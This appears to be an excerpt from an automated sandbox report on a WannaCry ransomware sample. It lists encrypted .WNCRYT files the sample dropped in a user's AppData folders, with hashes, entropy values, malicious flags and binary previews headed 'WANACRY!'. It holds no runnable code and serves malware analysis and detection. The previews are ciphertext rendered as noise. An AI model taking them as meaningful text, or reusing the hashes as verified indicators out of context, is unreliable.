                                Preview:WANACRY!......Q...&.::.......M..'...O...K..,o.Vn.TYfTJ.n.L...}.;>..g.$...a. F......4gTgu...<.;M...v...........c.u....!y.:..#.W.J8U.b..q7w7.|b.|.....w..e..c.#...5.S..L7.H.n......,.;.........3Z.R.....d3F...JRD...s.B.xV9..0.W?{........%.C.4..LO'.............2!.........X<R2.w.|..]v..h..`;.M.XzK\.|.{..."........N..-...*.'.....u..........B.0.O<.>.......v..u.61...7yTp.......U.3`......OTA8..Y..E1....v.s..B}...'......V6.{...0..tQE..2.+.[1..T..1..^.h+..t....AB{.....C3]..^...qO..U5_.$.J...0N.e..seTg.,!f]..r...V.............Z..@./Q.~...Ni.a........V|..I.Q.....x.).A..H.C./.Z'...ig.hF4=.s...f.)..u.7.OuA.(L.u0m.&..n.r.u.0+.7...N.$``MK.../.>.....I.X.....Q+.6..&/m&\.'I.18:..m.I..q........2..+.......R..~.$|........+..5.iV..5...Nl.D*..fA"i.....v4[.......7.a.x..z...J..........wr.K\....c.V..8.<.C.*y..7 .....K.u#...P.n.a...h\.....=.e..+b.B.V;0..Oy..$.WJ.......N.r...I..[...l.+....2\.b.nAt.nZ.G..B3..AG.^o.+..Q.EQ..|..fbyUc....4..2..{|..\=|t.r.~.Q.[..i.7..C.

                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.991863006782706
                                Encrypted:true
                                SSDEEP:384:qme1Zvwpsl4j8NbYhJMJVjReMWatl/Pq7AS2pJFxKgRLwEQ+IVd/wUveURAv:q3vwpsQzPM/4wtNIWRLPQduUvnAv
                                MD5:880D3A3BF527310FDD1230879B1CE7AB
                                SHA1:2968D0E23FC60551F33019C9729532E7E1AA0B03
                                SHA-256:5D0446671DEAED4D73B6D6B71566A647A1E09687E37C3F9A939B9D1F5B34BEDA
                                SHA-512:DAAF46B28D55A54B37B7096A62CE6B6AB0A25266B8C013519F047E404CEA71AD92A6D7C78A032033317375F9B1715DBA415D3319F03C3563F928D855ADF94EF1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....=.-gp.....5b.*3.....:.p..d.U.g.[f..b>4..M........d..`[.~.z...d....8..@.%............7..q..@v6..V.z-.C3..W]=o./xP...;....0y..<.].....}...6........_.*../.D.N=..R*...K.....|r<RWy9Aj.~..]H(...0e..jja.zt.W.....p.s...lr.&....b....6....._..]...z..P)%y..O.....`............7.x..0....pOM.1..w.......q...........,..=o.`.G..>H.~...'..PD.,m.!..J./......(..<.]4.`yB.1.y.<)\...q,_..]=....o:cd..u"...V".q..!Tw...q.:....:.1...}..k=.b"..+.g....mR#..P..>;...&N...C,..I.v...fw.7.7.n....j..CF.}.m.....f..>..F......:P.f...6.'......hiH....`.B...x.e..7.)aG.i..gt...(.&N..Gy.Q....+.!...Eh^,....ci...;.\.L.....j..0.J..A.7W...T5.jY....o_.wWk0&]..D.;.6...,...#V.....M.+..G.mW.....\+$....)~........rtq....G.d......5k.. =.\......e.....\.j.b.......5.yH2t...ybbhW...E....&.).~`..&)!.G....6..E .g..#.F..oF...t..u'.({....{..W..E.._~rH...!.g...:[....Q..........N.{.H...+.Q-.).......'%.m..zzH.K4h.A..T^..S...@R..RZ.i...].ig...4...?i;:.m}..:.v......~.6Er....J..g..27*

                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.99211829234718
                                Encrypted:true
                                SSDEEP:384:GrhRypGLMREWpu086pKlDGbETlVn3QfbeC5uLYxTpzJW7HhTEkfMLJxoGEuOIFQW:Gr6yMRHpA6QYETlZEuYxNQLh2Suj
                                MD5:497B9C5277932AC4367E3166018EDB67
                                SHA1:0EE96306299CFE68085725D6BABEB81B67CC2355
                                SHA-256:D96CEBC5C8E22C77CD7C4C653005F6DC1BB95175C3848C186EA6A933CE3B665E
                                SHA-512:B7C6235A640BC536364715A8A96BCBD8DF9C1D822D932CF4E80D7E21A0C5EE681D8E0F9AC703849AE67947F9828F15749279A3D274854AF7E9F0C14148A0E52C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......r.Nf.S...IR..\...".'......aH..e......5II4B..P...?.v.X........i.Fx.S.B....Hi.trDE..[A.gol..*]H...{."....t.<o6I...d.g......wN....H@...d....C..|.V.d...b...../.*u..AT.....vB....e....+.......A.N<q.5'.seV?JY:.V.z..~......v....F+X..,....VJ...e..:..(.....`.......rw..r.........}Y..T.|.0.'?&....%CdR...)a.\.J..I.<.09.,+u.E.N.6.JK.........}.D..,-.=. ..O..,`O2!.Ss.DEG,.....L....ZY...{v...E.....\..2x.y...p.p.....u.p[...<~9..n#4..^.{.=.r...Sl.3NE\.G.[.....B.p.y.Y....kA.^.a.(.....k.?.!E.D.....$.w.6....#S...>$.-nCm.t..H.0+..X.R..oM...p.... *.I....DTm..7O....+E.q..ZT+.h.)I.1....i[....I....N.Y..Y.@X.....X....i.v(.C....am..\3....}De..oX..X..r.3..5u......[...5 .s..8\K.....}6o@~.n......Z..Paz...\.^.+s....<,0..~.....wJ.u.....Frj.Cr.>......_.......w...'.t..2/.v.M........%.FJ..f..g.......s.0:Q..20X....K...w...>....`.}.G..XNI.....V1.".....@..ip..<j.0..+....3.I.......!..)}~.b.]4..=L..1.al. .xG....]S._#....BH..B-s...P....b.....G9..6..d;.FT...E..fj.....~...Fl.w

                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.9939748039748775
                                Encrypted:true
                                SSDEEP:768:rZqIKIA7CZnZjASDve0UAFJoUwwdF4FvPVMKHX:Fq6A7CZZj3+ZawFnVjX
                                MD5:11A0ED07075D4DEE231559AFA7FA697A
                                SHA1:01F155AAAF9ABE1691D112D266D02682FCE63BB1
                                SHA-256:4F3FD86A88FD5A5E7B6138BD6EE84ADC67998F64A1F5FE54EA05F166E3CC1475
                                SHA-512:71A89A1F7CC9DE4B004D870BC4D955C45025FFA5C08D1124718FC9FBCFC77F34B7A903AE2D4128B498A5CEA1F726DCFCDBA2F4BB922EE784CCFD084305EBC3DB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.............9.<..U....&Qao..R....W.)z...g.T....I....C.-UMn...J.H*....?.....r-wS.=..WoD`5.~...~..8?].....l.<........T.:0t#..k...}b.......$4..........5..4.....}.mbAUg.ZOx.. ..L0......04k...pU.9.=._t..p6.q...b.,5.S.."..........n...e..7.^...C..|..|..?.....`.........xi.;.......U:.`B...(.M.:k.)...$%......X.A.o.1.6.>...B.....m....g-....N...]....J.a5xSI....a@Y......]..W.T...:z%a/e.LV..1i...U....c.:....O.M;..&.l.v...}m.x...S....r4Tv.....V..`M.JR......L..3.>...}..x..[R..&.3..*H|.4.i....,...;".)r/...S..3.N....sc.....l_..._.\.P..Ng.kz6.S].w2Z.....|.}..@..ND..$.Bs..j....$..h].D.0.y.F..]U.?u.".......fC..X.LC.(#]*....D.oqTn...: ....&,.%.....9.e.B....+.}...lU.~A.p...u..!{...~x......M..y.................9'-?....J.;.......[x....B.}.......I.2...........i".f.8...8......G*o.......6......+...T)...i../....Mb..^.<..(.b..H.....N=.r~2u%/...6_.8$7.A..V..U..XV3.....5.3|..g....L0.....)i.....G.J.K.P2...f..S.~...mx...x...v.9.H5_..9.....;..(S.....Gs5....n.Ml..

                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4376
                                Entropy (8bit):7.954988295352507
                                Encrypted:false
                                SSDEEP:96:oG9JTpdXVpp/v7H95rb/pC/Wla6isT2EX2NGVbxkwvfimPqaeI:1B/b/rbxIKfCEbxkgyaeI
                                MD5:2919F5872F9D8A615E8FF4FB9E585896
                                SHA1:C01333065460103F4FC84494DBABD16223874B29
                                SHA-256:84A9EC0943D643896C737E86E2C0DFF17B3E128D0ABEDE01B0D5D31CC73EE872
                                SHA-512:EC8BCECEDA2D021AD1AAB9319EDE0D9A786A299C8E061AA723252B6A2C05E7CA3F121E2D01F1BA744F131AE3EFA48D3F64687D540BC5275CDE27DE50B0E13870
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Ma.......S.J91....P.&A.A0_..Ax.u.=....K#'>..s.QJ......d.zy]...MM.Q.}o.n9li...........>S......J.l...u.?.f.C..].#.......q.F..c.%.M.....r_).c.n..=.3v.....8o..8....h'......Y|.y..5V....k.>Q..].K={..>.j.d.E.@.\.UO...........y"I.O(........m.A.r.V..~.............[..E..5. n.h...2z\`....t... ../.....fG.{....O.6.... .I-...:...@..S...R....z.#N....r.,....O........<.y...R.P..U.P.......I...8z.....'C...^........,w|..LS.e.YR%}Ex.<D.UcA.....k).Z...m,O1..l.3..q1.....1yE......nx.K.D....K.F.K.{...s=.'...nP.g..#.3..n.iT.[........xT.p...^...%*@I..04f..@+`.h..Q=.Xj.o&7....BW.1R*..]\.1t.5.....$...r..6.\.sQ............!..Xdcs...XU.`.5i..~..O.....@5E.V.H../....Xo.C...k.|N0....{..F.yha....+4K.^fO qw7.>L..kG..eZY.Q.1.$`.9..8.h.a.~O.N...H..@>a......Z3...8..g}e.Ei.Na..I.g.c [......r~..'t.K0C.......nC......LoV...h}.!..>.........k..R.]).....@...x.2.....<.l..[7...v..S..x`X.* ..6.......Y'f..^..\..P....Wy..vF9...j`...5A*'.S...h5#vg..u.z.o~...p^4..aqT........i..SxB.V].t

                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24856
                                Entropy (8bit):7.9938753840559755
                                Encrypted:true
                                SSDEEP:384:vygueM61aH5tMN2HmBHvPdFG3rusZwthMDOsjVHvexm3Xq47BK6H93E+8ZrRmk:vUSJPPdFG34/mpVHvam3ZH93EBZ9t
                                MD5:806EFAC534C7F74D57D47B46126511CF
                                SHA1:6DA5028D6FDFC7EB57134D5141243500B4F35DA4
                                SHA-256:69A7DC9D1EA30F27BA7B97611E5EB823122393C778B32F8AA8D463EC8D7BA95B
                                SHA-512:B6C420759BC0226D1C3B1D44514B89D505A7F67B4DDB335B2D9F98889FACAD865A6B6DFAA9A8429C3410A631E3B87CC647FB4A1D2831F096DB3333033FDEA1C1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....Q{...~MH..V.b.mfY#..............}..!.R^\..=..&..T....'. ....&R..8.-;.(...F.m;......&...I....L.^fmT6....w.4....'.....S....?...}....#....].../q......."gh-rNw2^.>G.W....j..C;.c.]....'.t....L-pz/C.o.5!...lns.....fDN.|s..r.9....:&.sR.N*:".L..4.{@.....`.......*.(5....J.h....^....z..X.(v.U./...m.YQ.N!v.1...?.V1N0]....)...e.=.Sh...k...[.....'..x.Y.-.....R..@..c.SxD.|....L.B`...V7..[...&...c...|i.i...v..J...}!"....A....q......3n.%].Jn......vw`..Fx'.Y4....h9..Z.....c.U..l..L.m.(#j9tE.=..j9..]..!.K......@...q...f.|..#..R...Rs?......,K.....yM..].XC............U..d2...........<.^..e...!.$.t<9.(.z.. ...<...$.8*>VPtCf..G..,....$. ....../65.....r.H.97...zY.....x.............+.K..].e..i.........C....X...`".*..u.T.{.2...9e.q...&....E.....;F...r.......|1..D....9......).l..s.4...~.O..lo...'.....$..nv.U.......3.......6.8j...?...-2..8!..\.I.AR@.[..@ ..$...H..J..N....e....].;..f.....f[)e....B.......[..&mN.a.=...d..=...\..b.[.5J.a...'X.Z6F.

                                C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_251_0.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7160
                                Entropy (8bit):7.971077299985903
                                Encrypted:false
                                SSDEEP:192:m1sfQFQgyeX1VFq+iR9xPTBuwrmnfv/zn9Q:1fQQgyeX1VFqF9pifJQ
                                MD5:E9C730BDE31E3A13B594E0BF108046F8
                                SHA1:ED3A4D28EB8F3F7F39F5D53229E769A8E02FFFA2
                                SHA-256:597130712C0829B872B58279BE399BE05061B0DF42DC6AAFBE3B9E06DAAC2B17
                                SHA-512:02E45E65F6CC9903E437BB8CBB73C6E3E20E854F7168C2C684775B6FEDC8EF19610A4BFA47EA1CB7615D47B0F2AF44D10925E49998FEEDC58D00B94AB84D395E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....=.r....a.eS....jY.(...&.6..z.....J.......[..A.M..L......C7.0..~V......V1.U..s...?...........Py....%n[7...s_2.V....:...ae.5r..v/.;k..T......\.#..W.4...y.i.R..rvL.....+~.....8.e.n..7....x.r..~f."Ddt.Z.. ..7..|$F)e.T.....Ao..fR.D..c.Z..Q..F....;.............f..U1L..+:.P.S.....8h.z6....f.&%ZE.@78.l.n...:~.3R)......"\.o.K....;<s......7L...e_.`.........0....X+N.....G..~...O...).$H.*.....b..e...(?.Gzj...Q3...E.xt.._..g....:8.r..e....J....rw~`.[&"*...r.......0...PYN.+n...7.....E..\..?.Y.T!..#.1L..}..z.D.....c_...GP.....MXR.{~;..}.`1.}cej....z0S.w....v......V..,T..Z....W].I#..$..L./b..)...d.....mQ./.%..u..1....~.j.._.d.a.."~6|.#..i.R*...[..{."......u..:v.yQf.i.W=...0...:#.5...1..<z...}Aa.]D....0%..=..}.x..;N]5..Q..z..d....)U....l.D*...@W.......[...kM......"_................$).w..B....Y...U;:..w.$n&..zof*...a.3.1w...h..a;...o...0S2:.5....q.Y.K.E|Vd=*a.'?!...O~..+i..]Z...Pw..>..A..f...8.....d....me....W......@....%...I...3..h.T.....M.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.988678317073803
                                Encrypted:false
                                SSDEEP:384:TfmGTYJhsTImbldLfX/ObdSihHGyVkxEaq0c8kybcIe9IgYWg:bmGTyhCldL2bdDHGfWLZJPIig
                                MD5:8CBC6806124C2A42F141CA1101328E6F
                                SHA1:7238B1F4EE0BB8A264A72CBF86EF3067440ACD32
                                SHA-256:C20C53C027036A9922A14A505FF6B6D603F75137EA5386DC599CAF9EF4C47F06
                                SHA-512:9562E4B67F88E5AEC43A79E75ECE4DABE6E5FCE5B50CF3F8898D6E37AA5E0EE55FFB1E62959DA7A96231822D103C88D3DC8311B680CBD0374FF96F1EF1CB17DE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....c.qj..x..{?..!....M.!.w..=C].M...et..F~G .....b...(.J8..W.a..#s.b}19j...}.........B./......]...!ev.).....h.;gQ..#i.J.^....d.. f...6..........'.#O....r.........n.=....tQ.....S&,.5.-.V'..n..?..:..b...(!.....e....'Kd.......Z.+..".<Ykv^..iXm.........@.......8.{.V...ce.k..^.*. .....@{...`.j..KB...[R..6g.E....o..."+.?..P..6..?..V..lgY.0]...D....6..O,b{..[..,&...(.f.R....`....eR.....2..1H.N.d..J}...8...R...w.EZR.qT.f..........7[Y!s...-.0.H..7?....$.ZN.@I$...<........N.f.......].V.....h.O.(...y..9...S..}cc..gw.V4KIf....O..2...'.G5..8.]R..Z.EE...0..b.p:^%s....`.{......`f.D.5D.:....ocFs."..N.\I...c..+...D@a.....j.7.N..b.Z....^7W.........ed6.E.N*.J.xIh~.o..d.f.....&..W...(...OaE......$A.&..t.P.g....=D^N.".7]<.......X-...#...`#f..T@W.....$.l.:.0....Vv.PVZ.B.<.@..vpq....(..3.l/...S.H^..i..A.R..=G._..)...)..f.2.j..Z...A.....j..F.ir..../.d.&......1[X.{}.......?.(/.PR.&.j.?...SL.._...T.....[:...W. 9.5. dY.TC.=b....")..o q..".'G#

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.989086214686893
                                Encrypted:false
                                SSDEEP:384:4jBto3EDQvdIuPSXKWhVb9gbQnHbzF3Xq9BV0FKmLK682L:AtA7ve0IjlvZLz
                                MD5:C426D827D231905F00020E6C3BD75A0E
                                SHA1:95F7D1EEDDAE28497FDE67FAC8358C4B3447F5A4
                                SHA-256:F565BB8DD0F6D2D062913819DF7A2B7D3A8AD4A0CB1878ACFF123FDA4F02A934
                                SHA-512:D27975BAB4796E21615E66A514A1169DCFF962A865E04E25D0CB78E5B8AE106AC59DDA8D4FC21F9F3218DAFB6860695C5643DA5AD36AB324686C094155E881B3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....YJ..j....=p...W........^...aH.F.E....S...%V5..`0D!.....>....oZ......._,/...YbY....6 .D.Z..'..,.E.}.....KD.2U]...}.......-5..v..p.S....JnS.2..h.i....K...A......r....Fw...8hn.NUI.....j..?.V.......xj........};,h6..zrAU.gO.......7...G.Sz.7..r...%u.....@..........rt.OO_...3....x)....=:..a.ZEK._...E.I.,E.....b.%x....c...r....#...z.4.......4.t6......U.8..Rp..hB.."d.9.{S.D.... ...L...^W.q.....*..u8....1S....h..b..^m7.3T....l..T.T.#.I.$..y.....;.V.........YJr.kI..........UZ...G.r.g4f).....L.........I..@5?.7._.....V..o......s.JI.B.......T.o.........Q5-.L..P .M...Z..1 .. -p*G..i........#D....(1...XB..k.'....UF.l...;.s.E\I.A.....O.cp.|NP.)(2..5..pr.|.O.))..<..V...M.]J.E..fQn....\..K...%.=[:.,...../=...P...K........S...n'..wOgbvQ.`.}YzF..o.....3......y,..$...=..Kp.(.q..>x.v.;.]V...<.u..Sw.kT.cM"..}....Y.I..RPE&M5...L..%...p.Q.....x........3.)5..a.Y..*....%.....TL.vs...t..,.7.W..Wt;.....r.E>bSw..~...f.....KYEG......,.h..v/?.c.a.vMS

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):424152
                                Entropy (8bit):7.99963681436375
                                Encrypted:true
                                SSDEEP:6144:m3Nil2nXEuvaOuqo9G/N0rhsSf1HeV78NAI00Lpc75ddpji8DYWxv:mcoXP1o9JdsSdHc7/0NY5d/TDv
                                MD5:1528D334BB31355F99614A2C12202D45
                                SHA1:8516727ACEA4C17042848AACCFF7B114A63ED44C
                                SHA-256:5432EA4CC430E2752B0EEF8A07D8115A9F18D672D97E53E2F15460EC8448F9FA
                                SHA-512:1F7A8644B65FBDC89A6457B684F9BCED6A7C4A3649BC17AE33DE832BD271491143719526550B9EF071158A38488A2DC81D33658625D703863E434B052F03FE11
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....-.L.h.. ...d<*_O..a,..3:V...:...R........k.a.......7.....D.Y5..;L.`.....(.....Z/HOr..Z......J.in...)e.u.......2e-...Z....z5...j..0.....p.1i6*.......~..c j..+....WA|....H.g..0.l|..?....R...>.}?../.G..a..Q'.j.....q..%......`Ff.vJ.....3l ..>...?.a.....w......GTy/.}..#...XX......3.p.....Q.....W.eD..."./..!a./z..f.o...............w.P...H.`-..xS., %..f.'&..1....f ..eL......>z.h....@.+.Q..;....~...c....Z......1....._r..;..J.;.(.5...9..kf..Q.Q.....0......E...J.X.@...2B- ....d....F..jF..=.N.Q.qJ......d...|..*.....Mc~,.^.=t?.,....'$..H...n..'..;..bh=.Pk9.....5.N$..d.C..".f...'.....T9..4..MK..60.....8$.-4f].`.8&..l.{.{Jz...J47......Q<.G..c..6jph.o'*.g....4..7..."..H.CS.^|o.lQg.+.{B.....L.........M")_...eE*..\.k...q...b.>...q..-"?.{.k.<...<.H......3H..S.TM..".6....T7.6'..#.........-.......@...8)..r_'OR.S.......r..o..J.....G....u..<..G.......1}7M.:..!...Az..'/hK. .....x..a..........m...x<..@.e.j5......2...y2.z.L.C#g.....|......,h.i..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):97848
                                Entropy (8bit):7.9980461319611935
                                Encrypted:true
                                SSDEEP:1536:VKU/aBFMDnHXm81DyG9ZJYmEPA614OjBUI53zkMELYnJsL3E3OGReN1PrD:EnByuGamEPAQ4Q12MEUmL3E35RozD
                                MD5:2D05B7505D8E5A1F057CF4FC429B859D
                                SHA1:B3F2E998A0A576658071F53EAE54B0AA328CF4DC
                                SHA-256:92E7AED2712AF89767EA589EA87697F4CA9F8F1A67F4A8AA26AC935DDEF53F22
                                SHA-512:44D00A9445E4702D3989F10D7ED77CBA14496B5B71A987529D0B14DE3B6F5DA75AAA76A0D87D7E19CE050907A3842FDBED62F78C6FF4134C4C22D191E24B3A02
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......:.)...'..L.h........O..T.....nE.?db...,.o.1U..1..........JA.zY.z...x3.T.H....g-\9d..=..>/..I..(....3....+.;?.N.S..A.d.A..3.....~$.$.!.i.e..C....3.{E|.v<.0...FkX6$.......AD/bb.X_......GO9..... .a.5.?.......8..V..g......H.f..N.;,..........$.4.......}.......,I.._...f.8.......<..W.$.._Q....~....\.3pG<...+_..;..+%q...I.]...JR.z..<...(...t..."^../...NE.r..n.-.].{l.V0...._f..Z.l.mg..@.....L..p.$....'t.s..z....9..K..,A..3 ....G..H.gY.8N.!...m..1....`.........LHyq{.....4e.....r.X..YqX.2.j....2R...t./V.4...].e...O..5....#..........Z...2.....j.;..w..,...&..d...Z.%...Q..3bG.'j......*p&d.iH/...tV.i..m3.....X<..?..j.C..j..-........V..&..q..a9l.1..4.....al8..@..8...g.'.]8....Z5....;..,.....O9......3D...s<@4).......N.D+.....>.0.E..e.4Vg....i.....T..8J.....b..%O..b..{"...Q...Q..KW2.+'.......U.l..#.F.!....T.XC.?4l....6.n..:..B5/..}QT.i)`..<!._c.`.......r..I....kEs.4..HL.....&.Z$....&{DwJ2q..{..uF.5?Myj..T......}../..J.......i...:....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000028.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):100008
                                Entropy (8bit):7.998317699597924
                                Encrypted:true
                                SSDEEP:3072:e8XCs3BrI7QE5ctm/c+ZLwrQcbzp+CWRhUgQ:P3xID52vTbzp+Cw2gQ
                                MD5:A132D79D35C3A4A3F73EFBEA5F789FC7
                                SHA1:3867D5FFFE92BD0FD4B5615C607DCB0C710957DC
                                SHA-256:13879EF8061F082800964D61BC7A0B26CCF390C937FFF6C5ABAEC02E33BB6021
                                SHA-512:41872C56CE8C4AB699DD10E4E58A486FCA84B460B3BCD142331B2305DB0F1343B292AAA7DFA59A986459B078FB808B55652F19FA6F78BDB5BE5A4843581F8F72
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....Td;^..U.9.&..p.).(..9...>!U."l.)..o5.....c......|O.................3...X..*..j......\....a.G..*.6..&..c+.#M......._.{..WJ0.Z...&...-.ZS.H....z&.B..w...E.Qi".J.Z...%...v$q..*.....a.j..zcL........tqT39.......B.......^..6J`VnA......{.9s1..%J...............z$..].wB>...G(!...m..y\.o.....^6.0.,.7....i..0....O....^.......!..EW.#..$.K.....n%..D.UQ8.....c..`..~fH.y..H..M...q.NE...x"..<.DW...b...].B....ff.~.....|.....7....Z.G.M...;G.g.R...{G.T..TEJ.cyu./v!.T...z.<....Ztk...MB.q.X@..3oBuM{L...Ax....@I.<.......0}..RC2z.k....d..Y.y..qk..!.).&..P..C?.G.|.X.=..+.{...0<FK.o....g...sU.....^.(.'..\...\.q9.Z.....8.]......L"Q...W.N9.&......7.8.W.g....E.~...:.>...F."...p..A...:.>..#..k..CY.-.Z....e/1..n.."!.........7.1..%C...!M.....j..7IafH.o.|.G'"VvWU_l`y.v......5....)k..KU.'s..? k...Z.w).9....L.....n.....&..V..J.<...~Z...~.=ru.=..!.m...g?..t.<7V.&...n.r.."}B:#"....X..a..6.d2..J..v..F..f.......q@.1/..}E...7cN3+..#..g.U...a+......m1

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):75576
                                Entropy (8bit):7.997674457313432
                                Encrypted:true
                                SSDEEP:1536:ARpRSn8OyqPVw2duo8AkmXTNXAa4U0nlCeG9ZrgV0or98+izou6SzH:AdSn8OIo8AkmXTNXBeCDFgVK+ao0
                                MD5:3A456BD64DA1F7071F48F5D73E676B3B
                                SHA1:214BFB97B62A49DC9B6C4CE8683DAFFCB17B75E6
                                SHA-256:76A5DB0BB71A21E6A94F305CBA31914F8B38C2657DD0A9CB84354DA563CD8814
                                SHA-512:89B87B410B0CAC3B79530814677B26CCCDB0C07C97CC38A36972AEE0D0DD82C1893412B64131ED9DA0853D909E3E55A2C7B1A0F5FD9A9A5B11279804C75EC9B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....)X...,...:..V.*.k..M....&W...-.;.I[.!X...t.Z....G....<*..u....?.#A.{..\.N9e.......7.....@_Iq0..8..~..Z`.{<.W_.~..j..~..&.@.M4..}%...w.z.'..,.~"..)...8.....3h.}...c...9}..8}y.........a.:...Np.8. . .ME..^z..._......-0.i.2.z.`.AP...!.....m./H:[l.|f._......&........!.(......JD.....}..m.d.\[Bb.W\..K........!.M3..z....A...D..fD..A\.G..?.%h,..s$R..P...y..-M.T.y..}.g..c....,b.z..;..m.HD..Pix.5.*.......5.H.n.'......u2s.t.....&..UO.rR.I9.E..c.$......u..OB.8F.!.._...,Bn..a`G.W>=.]Jl7..i.'d.<.V1..T.....|..G.....C.7....<n.w.C{C...8.j/..'40..?....1:........C.....pE..]..P.o .... 40x7.!....X....35.K.(~..[..Z...c.&y.g'{x..Z2.h.{.U...!..Rv....8M..K.Z...f)w.9......)AZ].-?):0....b....-.ni.o.s..X.Z..I..i.o.-....).o.......?Wc.R|s....y1.....yn....-#B.-.w%...U......(....0..)..T0....>A4uT*..!.".Z.S5......#V.. Hi-..Z..=.-.o2)...*.rZ\$.h^2....Ho.9.>.....j1.&.......:1...y.7....l.}..m...8..%rP.Vq.`r%o../(NzXu...b.xh.k..Bs.)...I.<X.....G.W..(.......zK.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):75352
                                Entropy (8bit):7.997659367482623
                                Encrypted:true
                                SSDEEP:1536:QLEGzl9hApf7eW/z0r9GwqDWukMKWZZltOeXJyspgm:QpzJE7f/z0Giu9KW/bZHph
                                MD5:F0DF2193ACD4B96B056434D1A3A71B1B
                                SHA1:9977D67865AB720C85D9DFA0EE3B78CED9F4A5FC
                                SHA-256:8318E7D38AD744906B6B7079A90CA5BF3974F0DC9B1F92C53C305AB21C917A8C
                                SHA-512:7C787CA97D9DE5F55A07675580484647EB609B800C70E2BC805322721A94B1D9D00DC97280F3F3BE7B34A49A6F10C4C4A9226154B83DC87BC814BA909744C952
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....Q..B...<..H|[..|..+w{....yJ..{....M9........V.....k.I....My..U...d.e....^.4.a........l./..o.Y...E..>..8.... ...l....t.b..X{1..U.Z.f,....+.J.Wu"..m.t0.}'..C....y.hJ9.A...X..O.H.....7#/x..m_...M...OU._...._..rk.B.....t.d.<.....{.P.c....-.../.gd..'....8%...........#..Q.$y..._qIA..nK..X......=.p..(.~.5.>.>....kP.<.%-u..A.n.0........u.#.?@.@P..diT...W...$.7...D...Rv........e...:.o2~I...Q....`Rs.i4L.....;...Y..D...+...'..!.JO.\G.......s.Z.5...%..Z\..|G....T...............h......F..0..r.o5.GF'.Z..90...~....y.x8iA.ow..._1...e..[...(....+...O...h..C..O......`.!..-..#..._}.l...d.-.E.<.dk.*..[.4.}.L%.x..B.{&1..8....~...w/....(..h.le.F.*..a.%7......9^._gvf\..3....E....9x4.c..s.B....b.....h....-]..?n..:.w.Z...8...7..xE...ul^|w.F.&..U.2;.'.]..Z.l.jTJS. H..g[n.7...2..._.p.....oT.8..0...u.%./5....K.8.G.....&....A...<..u....?6..u.;.W:....74.F.f.f.W.{...5.._kn..A.]).w..!f..~.G(^..%^.&."\. c......f......<.^.. {...\...J.Qb..=.XF.l3......th

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.WNCRYT

                                Download File
